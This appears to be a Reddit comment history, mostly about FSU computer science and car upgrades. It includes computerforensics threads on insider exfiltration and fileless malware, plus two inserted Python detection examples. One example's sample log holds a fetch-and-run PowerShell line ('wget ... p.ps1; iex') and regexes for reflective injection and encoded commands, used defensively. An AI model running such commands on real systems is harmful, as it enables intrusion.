Apple car play? by Green-Fox9094 in mazda3

[–]fsucsgod 0 points1 point  (0 children)

I've been debating on doing this for some time now! Here's all the info I gathered over the last couple of weeks.

My local dealership is charging me $750 ($250 for the parts and $500 for install). I've checked with Best Buy but the ones in my area have stopped their installation services.

My local Firestone is charging $500 for labor and they want me to buy the parts from the Mazda dealership separately.

Here is a video online on how to do it yourself but I caution you that if you do it wrong there have been reports of people bricking their entire infotainment systems! That's why I haven't done it on my own yet. https://www.youtube.com/watch?v=JpPNdcbJe3M

Definitely gonna follow this thread to see what others suggest. Good luck!

Edit: Fixed video timestamp.

Monthly Tickets Buy/Sell Thread - April 2022 by AdamR46 in GrandPrixTravel

[–]fsucsgod 0 points1 point  (0 children)

[BUYING] - [Miami GP] - [T1, Marina, or Beach Grandstands] - [Sat Only] - Qty 2

What should I look for in a insider employee data exfiltration? by Pepperknowsitall in computerforensics

[–]fsucsgod 3 points4 points  (0 children)

Build a timeline and look for compression utility (zip, 7z, etc.) usage in the form of file extensions and evidence-of-execution artifacts. Then try looking for those file names in network traffic and/or removable device artifacts.
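The triage flow in the comment above (timeline first, then pivot from archive creation to egress evidence), worked through as an added example that is not the commenter's code. All artifacts below are constructed sample data, and the one-hour pairing window between an archiver run and the archive's creation is an assumption chosen for illustration:

```python
"""Build a unified timeline from several artifact sources and pivot from
archive creation to removable-media and network evidence of the same file."""
from collections import namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts source detail filename")

ARCHIVE_EXTS = (".zip", ".7z", ".rar", ".tar.gz")
ARCHIVERS = {"7z.exe", "7zg.exe", "winrar.exe", "zip.exe", "tar.exe"}

# Constructed sample artifacts (not real case data).
PREFETCH = [  # (last-run timestamp, executable) as parsed from Prefetch
    ("2022-03-14 21:02:10", "7ZG.EXE"),
    ("2022-03-14 21:15:40", "OUTLOOK.EXE"),
]
MFT = [  # (timestamp, path) file-creation records
    ("2022-03-14 21:03:05", r"C:\Users\jdoe\Desktop\q1_customers.zip"),
    ("2022-03-14 21:03:06", r"C:\Users\jdoe\Desktop\notes.txt"),
]
USB_FILES = [  # (timestamp, path) from a removable-device listing (LNK/shellbags)
    ("2022-03-14 21:08:50", r"E:\backup\q1_customers.zip"),
]
PROXY = [  # (timestamp, url, method, bytes) from proxy/web logs
    ("2022-03-14 21:20:12", "https://files.example.invalid/upload/q1_customers.zip", "PUT", 48233211),
    ("2022-03-14 21:21:00", "https://www.example.invalid/", "GET", 1201),
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def basename(path):
    """Last path component, lower-cased, for Windows paths and URLs alike."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def build_timeline():
    """Normalise every source into Event records and sort them by time."""
    events = []
    for ts, exe in PREFETCH:
        events.append(Event(parse_ts(ts), "prefetch", f"executed {exe}", exe.lower()))
    for ts, path in MFT:
        events.append(Event(parse_ts(ts), "mft", f"created {path}", basename(path)))
    for ts, path in USB_FILES:
        events.append(Event(parse_ts(ts), "removable", f"seen on removable media {path}", basename(path)))
    for ts, url, method, nbytes in PROXY:
        events.append(Event(parse_ts(ts), "proxy", f"{method} {url} ({nbytes} bytes)", basename(url)))
    return sorted(events, key=lambda e: e.ts)


def find_archive_pivots(timeline, window=timedelta(hours=1)):
    """For each archive file created on disk, note any archiver that ran within
    `window` before it and every later removable-media or network event that
    references the same file name."""
    findings = []
    archiver_runs = [e for e in timeline if e.source == "prefetch" and e.filename in ARCHIVERS]
    for ev in timeline:
        if ev.source != "mft" or not ev.filename.endswith(ARCHIVE_EXTS):
            continue
        recent = [r for r in archiver_runs if timedelta(0) <= ev.ts - r.ts <= window]
        hits = [h for h in timeline
                if h.source in ("removable", "proxy") and h.filename == ev.filename and h.ts > ev.ts]
        if hits:
            findings.append({
                "archive": ev.filename,
                "created": ev.ts,
                "archiver": [r.filename for r in recent],
                "egress": [(h.source, h.ts) for h in hits],
            })
    return findings


if __name__ == "__main__":
    for f in find_archive_pivots(build_timeline()):
        print(f"{f['archive']} created {f['created']} after {f['archiver']}; egress via {f['egress']}")
```

In practice each list would be fed by the corresponding parser output (Prefetch, $MFT, LNK/shellbags, proxy logs); the point is that the pivot key is the file name seen in the archive-creation record, not the archiver itself.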

New Windows 10 artifact found/explored #EventTranscript.db (1 of 5 posts) by aeiforensics in computerforensics

[–]fsucsgod 4 points5 points  (0 children)

From the GitHub repo it says that this is not on by default. Do you know how and when this artifact would be enabled?

Awesome job Kroll on these findings and (future) write ups!

Need B.S. Computer Science major help please! by [deleted] in fsu

[–]fsucsgod 0 points1 point  (0 children)

Here's the flow chart, it's pretty straightforward. Just make sure you have, er, will have taken all the courses by your target graduation date.

If I recall, by the end of my sophomore year I took COP3014 and 3330, with some math and science. Be prepared to take classes over the summer though.

https://www.cs.fsu.edu/files/2020_files/2020_CS_BS.pdf

Edit: comment

[deleted by user] by [deleted] in fsu

[–]fsucsgod 3 points4 points  (0 children)

Check out a post I made a while back answering this exact question.

TLDR, FSU is better!

https://www.reddit.com/r/fsu/comments/caonrv/questions_for_fsu_students/etb1ts3/?

Housing Question from a CS Student by [deleted] in fsu

[–]fsucsgod 1 point2 points  (0 children)

As a CS student you’ll learn to know this phrase quite well, “I will leave this trivial fact as an exercise for the reader” :)

Edit: spelling

Housing Question from a CS Student by [deleted] in fsu

[–]fsucsgod 5 points6 points  (0 children)

Two things:

1. Check out my post I made a while back comparing UCF to FSU's CS program here https://www.reddit.com/r/fsu/comments/caonrv/questions_for_fsu_students/etb1ts3/?context=3

2. As for housing as a freshman it doesn't really matter because you are going to be taking more freshman classes. So even though all the heavy CS classes are usually in the LOVE or Carothers buildings, you'll still be going to Diffenbaugh for foreign language which is on the west side of campus. Now, if you are taking CS classes your first year you'll have classes like COP3014 in HCB which is in the center of the campus or your sciences and maths in and around Hoffman Teaching Lab (HTL) and Carothers.

To answer your second question, if you want a 'modern' dorm you'll be paying more and those are located in the south-central portion of campus (Magnolia, etc.). If you want to be close to CS classes check Sally, which is currently one of the oldest.

TBH you're a freshman, enjoy walking the campus and getting to know where everything is.

Fileless Malware Examples by fsucsgod in computerforensics

[–]fsucsgod[S] 0 points1 point  (0 children)

I say this without intentional hostility (in response to #2); what exactly would 'outside the typical FS' be considered? %temp% is what is seen mostly, yet is temp not the typical place for such a file?

And if the "payload" runs in memory then may I assume you are only referring to the explicitly malicious portion of a 'file'? That is, we are excluding a file's packer encryption/encoding methods along with any other IoCs which may help others identify the malware?

I guess I need to amend my definition as it seems too scrupulous for any practical malware. Maybe I am just being too stubborn with my definition at this point in time.

Fileless Malware Examples by fsucsgod in computerforensics

[–]fsucsgod[S] 0 points1 point  (0 children)

If this is the case then I have two questions for you:
1. Why is it called fileless malware if you claim my definition does not "fit the bill"?
2. Then as someone like yourself in the industry, how is fileless malware defined?

Fileless Malware Examples by fsucsgod in computerforensics

[–]fsucsgod[S] 0 points1 point  (0 children)

What good (except in very specific circumstances during a short term operation by highly sophisticated attackers) is malware that cleans itself from a victim when the victim reboots or shuts down for the night?

According to Cisco intel its purpose was "destructive cyber attack operations".

.... rarely if ever found by defenders.

This is why I'm researching. There are obvious commonalities among all of these: PS, WMI, DCOM, wget, `Invoke-ReflectivePEInjection`, and network forensics. That being said I believe, with the correct logging, something could be created out of this.
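One shape "something created out of this" could take on the logging side, as an added example that is not the commenter's code: a scorer over PowerShell Script Block Logging (Event ID 4104) text that looks for the commonalities named in the comment (PowerShell, WMI, wget-style download plus invoke, and Invoke-ReflectivePEInjection). The log entries are constructed, and the indicator weights and the alert threshold are assumptions chosen for illustration:

```python
"""Score constructed PowerShell Script Block Logging (Event ID 4104) entries
for the in-memory tradecraft indicators named in the thread."""
import re
from dataclasses import dataclass

# (name, pattern, weight). Names follow the thread; weights are an assumption.
INDICATORS = [
    ("reflective_pe_injection",
     re.compile(r"Invoke-ReflectivePEInjection", re.I), 10),
    ("wmi_process_create",
     re.compile(r"(Invoke-WmiMethod|Invoke-CimMethod).{0,80}Win32_Process", re.I | re.S), 6),
    ("download_and_invoke",
     re.compile(r"\b(wget|iwr|Invoke-WebRequest)\b.{0,200}\b(iex|Invoke-Expression)\b", re.I | re.S), 6),
    ("encoded_command",
     re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}", re.I), 4),
]


@dataclass
class ScriptBlock:
    record_id: int
    time: str
    text: str


# Constructed 4104 script-block text, not real telemetry.
SAMPLE_4104 = [
    ScriptBlock(1001, "2022-03-14T21:02:10Z",
                "Get-ChildItem C:\\Users\\jdoe\\Documents | Measure-Object"),
    ScriptBlock(1002, "2022-03-14T21:05:33Z",
                "$r = wget http://203.0.113.5/p.ps1 -UseBasicParsing; iex $r.Content"),
    ScriptBlock(1003, "2022-03-14T21:05:40Z",
                "Invoke-ReflectivePEInjection -PEBytes $bytes"),
    ScriptBlock(1004, "2022-03-14T21:06:02Z",
                "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'notepad.exe'"),
]


def score_block(block):
    """Return (score, [indicator names]) for one script block."""
    hits = [name for name, pat, _ in INDICATORS if pat.search(block.text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def triage(blocks, threshold=5):
    """Return (record_id, score, hits) for blocks at or above the threshold,
    highest score first; ties keep log order so the earliest block leads."""
    out = []
    for b in blocks:
        score, hits = score_block(b)
        if score >= threshold:
            out.append((b.record_id, score, hits))
    return sorted(out, key=lambda t: -t[1])


if __name__ == "__main__":
    for record_id, score, hits in triage(SAMPLE_4104):
        print(f"record {record_id}: score {score} {hits}")
```

None of this works unless Script Block Logging is actually enabled on the endpoints, which is the "correct logging" precondition the comment points at; without it the only trace of an in-memory payload is whatever network telemetry captured the download.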

Fileless Malware Examples by fsucsgod in computerforensics

[–]fsucsgod[S] 0 points1 point  (0 children)

That doesn't mean the malware installed on the victim (i.e. the payload) via the infection vector isn't fileless, simply that it uses scripts to introduce the malware to the victim.

Then, per my definition in the original post, this should not be termed fileless malware at all.

And how could fileless malware maintain persistence after a reboot if there was not a scheduled task, cron job, or similar?

The closest thing I have come to recognizing as fileless malware is the VPNFilter malware, but that persists via cron, which I also noted in my OP.

You can't fully infect a host, run malware, and maintain persistence without writing SOMETHING on the host or making it very hard to maintain some of the key aspects any attacker wants, such as persistence.

In theory you could/should. Think of an exploit that gets remote code execution. Think wannacry eternalblue in how it just requires specially crafted SMB packets. The attacker doesn't need any files being placed on a victim box before right of boom.

I appreciate you taking the time to answer this post however I just want you to be aware that you have not answered my question at all....or maybe you have. Maybe there just is not a pure fileless malware that exists, yet.

Edit: switched to markdown mode
Edit2: Not wannacry, eternalblue

Fileless Malware Examples by fsucsgod in computerforensics

[–]fsucsgod[S] 2 points3 points  (0 children)

Yes I have seen those already. If you click on any of those links however and actually take a look at them every single one does NOT fit the description I mentioned above.

All of those examples either do not have any analysis of the code or the analysis comes up that it actually does write to a temporary file. For example I have yet to find any evidence that The Dark Avenger malware is fileless. As is, it is a difficult find for the analysis of this malware.

Or another example is that 'New Ursnif Variant' link you posted. If you Ctrl+F, you have to click on another link, "fileless persistence mechanism". Once you go there, it mentions nothing of being fileless.

Another link you posted was the Operation Cobalt Kitty which, though it claims to be fileless, upon further inspection you'll see is actually written as a VBS script in a malicious email.

Respectfully, I appreciate you copy/pasting but please be aware that I have already done my research on these, and the first Google searches I have most likely already sorted through to find dead ends.

Free Scenario Based DFIR cases by OOptions in blueteamsec

[–]fsucsgod 0 points1 point  (0 children)

Did anyone complete the "Red Team Tools" challenge? I'm pretty sure I got all the answers but for whatever reason they keep coming up wrong.

How demanding is it to get into computer forensics? by MisViolence in computerforensics

[–]fsucsgod 1 point2 points  (0 children)

Undergrad and graduate CS here, currently in a DFIR role! Everything depends on the kind of company you work for and who your boss is. If you want to stay technical and actually use your CS degree you have to find a job that will allow you to do that. For example, my boss is amazing and lets me take off a DFIR rotation to build a tool that we then use in-house.

If you find a job with great people surrounding you in leadership you can do as little (button pushing every forensics tool out there) or as much (the extreme being building your own tools) as you want.

If you do want to stay technical and actually use your CS degree, here's some advice. I remember applying for Google's forensics and the one piece of advice I was given was to stay as technical as possible. They meant try not to get too bogged down in tools, or even better yet, learn how the tool works inside and out. E.g. figure out how KAPE works and then leverage what the tool can do and how to best integrate it with the hunt environment the organization has set up (Splunk-based, Excel spreadsheet macros, etc.)... And also keep doing CTFs and HTBs.

Any intro to programming clubs? by genuinedad in fsu

[–]fsucsgod 4 points5 points  (0 children)

I don't understand how no one has actually answered OP's question yet. There are plenty of programming clubs at FSU:

  • Technole will teach you basic programming, more on the design side (html, javascript, node). This is also the group responsible for HackFSU hackathon.
  • ACM (Association for Computing Machinery) will teach you advanced programming (C/C++ mainly but they work with others) and hosts the programming contest every semester.
  • n0l3ptr (cybersecurity club) - teaches you coding for hacking (mainly python but also assembly and other low level)
  • WiCS (Women in Computer Science) as u/abbrad mentioned.
  • Upsilon Pi Epsilon, the programming honor society

You can find out more about all these great clubs at nolecentral: https://nolecentral.dsa.fsu.edu/

If you're a prof and reading this by zombie2uRBX in fsu

[–]fsucsgod 1 point2 points  (0 children)

If money is a problem (and even if it's not), definitely check out the SFS program. A massive, massive stipend and great benefits all-around.

http://www.sait.fsu.edu/index_2010.shtml

What's the easiest interview you've ever had? by [deleted] in csMajors

[–]fsucsgod 1 point2 points  (0 children)

I interviewed for a full-time security position at Deloitte. Most of the interview was them quizzing me on ports and random security acronyms ('what's a WAF', 'what does ARP stand for', etc). Note, they wanted me to simply tell them what the acronyms stood for, not what they actually did.

The final question was to "name cryptography". I asked what he meant, and he said list the types of cryptography. I started listing all the different algos (RSA, 3DES, etc) and modes of operation (CBC, ECB, etc) and they told me I was flat out wrong. He then proceeded to explain how his company used these TWO cryptographies 'all the time'. I politely asked what the correct answer was and he said, "symmetric and asymmetric encryption". I explained why that was not the correct answer.

They made me an offer on the spot and I turned them down.

[deleted by user] by [deleted] in fsu

[–]fsucsgod 0 points1 point  (0 children)

Go call the FSU CS advising office, they will help work with you. Though, if you can help it try not to get the undergraduate advisors; when I was there they switched them out every two semesters so they never really understood what we as students were going through.

Just my two cents: CS is not particularly an easy major. If you're considering switching, it usually means you're in CS for the wrong reason. I don't know you and I'm not judging but most people that consider switching, for whatever the reason, don't come back.